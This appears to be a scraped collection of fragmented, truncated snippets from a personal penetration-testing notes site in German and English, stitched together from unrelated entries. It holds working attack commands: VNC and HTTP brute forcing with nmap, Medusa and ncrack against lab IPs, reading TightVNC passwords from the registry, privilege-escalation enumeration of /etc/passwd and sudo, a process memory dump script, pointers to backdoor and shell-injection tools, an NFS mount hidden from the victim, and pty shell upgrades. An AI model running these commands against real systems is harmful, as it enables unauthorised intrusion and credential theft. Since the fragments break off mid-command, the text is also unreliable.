Auf dem Client: root@raspberrypi:/etc/apt# cat apt.conf Acquire::http::Proxy "http://10.10.14.38:3128"; Auf dem Proxy:
Cross-compiling for 32/64 bit systems sudo apt-get install gcc-multlib gcc ‑m32 datei.c Tipp: Add ‑static for a static binary. Note that you need to install packets for the target platform, e.g. apt install gcc-i686-linux-gnu. Cross-compiling for Windows Install the packages like apt install gcc-mingw-w64. Then use x86_64-w64-mingw32-gcc execute.c -o execute.exe. Disable security features You can…
Brute force is possible with nmap: # nmap --script vnc-brute -p 5900 localhost For TightVNC, use vncpwd to break passwords. A password can be obtained via reg query HKLM\Software\TightVNC\Server\ /v Password
1. Manual enumeration id pwd uname -a // are there kernel exploits? cat /etc/hosts cat /etc/passwd ls -lah /etc/passwd cat /etc/group cat /etc/fstab cat /etc/crontab df cd /home && ls ... // or execute ls -lahR /home/ cd /root && ls ... netstat -antup ps aux sudo -l su // if passwords are already known…
Mit distccd kann man entfernt compilieren.
Tools to detect nmap ‑O nmap-chronos Tools to detect and validate p0f JS to list browser characteristics which could send back to an attacker via an AJAX request: /itsec/wp-content/uploads/2021/05/browser_detection.html Tools to impersonate Against browser/JS-based fingerprinting: Just tamper with values from the browser in about:config.
Enumeration Mandatory Optional On Windows
With Medusa Doesn’t seem to work with virtual hosts! medusa -h 10.11.1.49 -u bethany -P Dog_Names_normalized.txt -M http -m DIR:/~Public -T 2 With ncrack Doesn’t seem to work with virtual hosts! ncrack -vv --user bethany -P Dog_Names_normalized.txt http://10.11.1.49:9505 -m http:path=/~Public/ With metasploit Use module auxiliary/scanner/http/http_login Virtual hosts If Host headers are not supported: More
Afterwards: See Analyzing memory Linux Prozess memory dump Find out which memory segments are used by an application via its PID: cat /proc/<pid>/maps Dump the used memory from an application: (credit) #!/bin/bash grep rw-p /proc/$1/maps \ | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \ | while read start stop; do \ gdb --batch --pid $1 -ex \…
https://github.com/Tib3rius/AutoRecon Multi recon tool for broad scanning
Download: https://github.com/droope/droopescan droopescan scan drupal -u http://$target/ -t 32 Or just install via pip pip install droopescan
Weevely https://tools.kali.org/maintaining-access/weevely Erzeugt PHP-Skript auf Server, mit dem man eine Shell wieder bekommen kann. Various scripts Shelter (win32) Dynamic shell injection tool into normal Windows binaries. https://tools.kali.org/maintaining-access/shellter Create own (normal) shell HTTPTunnel Needs PHP; creates file on a server which acts as SSH proxy. Nishang Collection of PowerShell scripts for backdoors and more. Kali:/usr/share/nishang dns2tcp Creates a TCP…
https://tools.kali.org/exploitation-tools/commix Created SQL injections on the fly.
Crawling Before using brute force, consider just crawling: Directory enumeration Hints: General search nikto -host $victim gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60 gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60 gobuster dir -u http://$target/ -p socks5://127.0.0.1:9991 -w…
Union-based injections Blind SQL injections If no output is given from a statement, try to use time-based approaches. Fuzzing Enumerating in inserts Assuming the INSERT statement is INSERT INTO $tablename (email,name) VALUES ("email", "name"); Then try a timing attack to determine if a certain value is in a field: INSERT INTO newsletter (name,email) VALUES ('name', ' '…
General objectives Organizing template Web ressources Tools Notes
List with a ton of one-liner web servers in various languages HTTP python -m SimpleHTTPServer 8000 python3 -m http.server 8000 HTTPS ruby -r webrick/https -e ' WEBrick::HTTPServer.new( Port: 8000, DocumentRoot: ".", SSLEnable: true, SSLCertName: [%w[CN localhost]]).start'
(!) See also Password spraying to check a obtained password against usernames. Note: Use http://rumkin.com/tools/cipher/ if you have to encode/decrypt/decipher something on the fly. Wordlist optimization If there is a password policy known: Check password policy In Windows, type net accounts to get informations about account locking, lockout threasholds etc. Cloud-based performance cracking See NPK Default passwords Hashcat Am…
Displays all available network shares: showmount -e $target Normal mount mount -t nfs $target:/home /mnt Mounting with nfspy — with the hide option, it mounts and unmounts for the server so the victim cannot see the new connection via showmount. nfspy -o server=192.168.1.124:/home,hide,allow_other,ro,intr /mnt Mount via SSH ssh -N -L 3049:localhost:2049 user@hostname mount -t nfs -o port=3049…
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';